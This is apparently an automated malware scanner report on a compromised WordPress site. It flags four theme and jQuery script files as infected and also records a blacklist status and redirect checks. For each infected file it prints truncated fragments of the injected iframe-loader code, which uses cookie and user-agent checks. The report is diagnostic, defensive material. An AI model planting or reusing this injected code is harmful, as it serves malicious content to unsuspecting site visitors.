New scan:

Malware Scanner report for symbiose-gmbh.de

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "symbiose-gmbh.de" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/14
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=symbiose-gmbh.de

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://symbiose-gmbh.de/
200 OK
Content-Length: 32575
Content-Type: text/html
clean
http://symbiose-gmbh.de/wp-includes/js/jquery/jquery.js?ver=1.11.0
200 OK
Content-Length: 97453
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3110 bytes are skipped ...
e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?n.css(b,c,g):n.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),n.fn.size=function(){return this.length},n.fn.andSelf=n.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return n});var fd=a.jQuery,gd=a.$;return n.noConflict=function(b){return a.$===n&&(a.$=gd),b&&a.jQuery===n&&(a.jQuery=fd),n},typeof b===L&&(a.jQuery=a.$=n),n});
jQuery.noConflict();

Antivirus reports:

Avast
HTML:Iframe-inf

http://symbiose-gmbh.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 8251
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3221 bytes are skipped ...
ector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);

Antivirus reports:

Avast
HTML:Iframe-inf

http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/cufon.js?ver=1.0
200 OK
Content-Length: 43924
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 3515 bytes are skipped ...
renderText();
}
}

var gradient = options.textGradient;
if (gradient) {
var stops = gradient.stops, fill = g.createLinearGradient(0, viewBox.minY, 0, viewBox.maxY);
for (var i = 0, l = stops.length; i < l; ++i) {
fill.addColorStop.apply(fill, stops[i]);
}
g.fillStyle = fill;
}
else g.fillStyle = style.get('color');

renderText();

return wrapper;

};

})());

Antivirus reports:

Avast
HTML:Iframe-inf

http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/jquery.fitvids.js?ver=1.0
200 OK
Content-Length: 3837
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/plugins/2-click-socialmedia-buttons/js/social_bookmarks-min.js?ver=1.6.3
200 OK
Content-Length: 29141
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/cufon/Museo_Sans_500.font.js?ver=1.0
200 OK
Content-Length: 134815
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.50.0-2014.02.05
200 OK
Content-Length: 17356
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.8.1
200 OK
Content-Length: 10681
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/superfish.js?ver=1.0
200 OK
Content-Length: 4884
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/supersub.js?ver=1.0
200 OK
Content-Length: 4437
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t
... 1678 bytes are skipped ...
LIs.css({
'float' : liFloat,
'width' : '100%',
'white-space' : 'normal'
})
.each(function(){
var $childUl = $('>ul',this);
var offsetDirection = $childUl.css('left')!==undefined ? 'left' : 'right';
$childUl.css(offsetDirection,emWidth);
});
});

});
};
$.fn.supersubs.defaults = {
minWidth : 9, maxWidth : 25, extraWidth : 0 };

})(jQuery);

Antivirus reports:

Avast
HTML:Iframe-inf

http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/hoverIntent.js?ver=1.0
200 OK
Content-Length: 4308
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/gdl-scripts.js?ver=1.0
200 OK
Content-Length: 7794
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/jquery.easing.js?ver=1.0
200 OK
Content-Length: 9352
Content-Type: application/x-javascript
clean
http://symbiose-gmbh.de/wp-content/themes/modernize_v2-23/javascript/jquery.prettyPhoto.js?ver=1.0
200 OK
Content-Length: 27494
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: symbiose-gmbh.de

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 06 Oct 2014 04:36:46 GMT
Server: Apache/2.2.22
Content-Type: text/html; charset=UTF-8
Link: <http://symbiose-gmbh.de/>; rel=shortlink
X-Pingback: http://symbiose-gmbh.de/xmlrpc.php
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: symbiose-gmbh.de
Referer: http://www.google.com/search?q=symbiose-gmbh.de

Result:
The result is similar to the first query. There are no suspicious redirects found.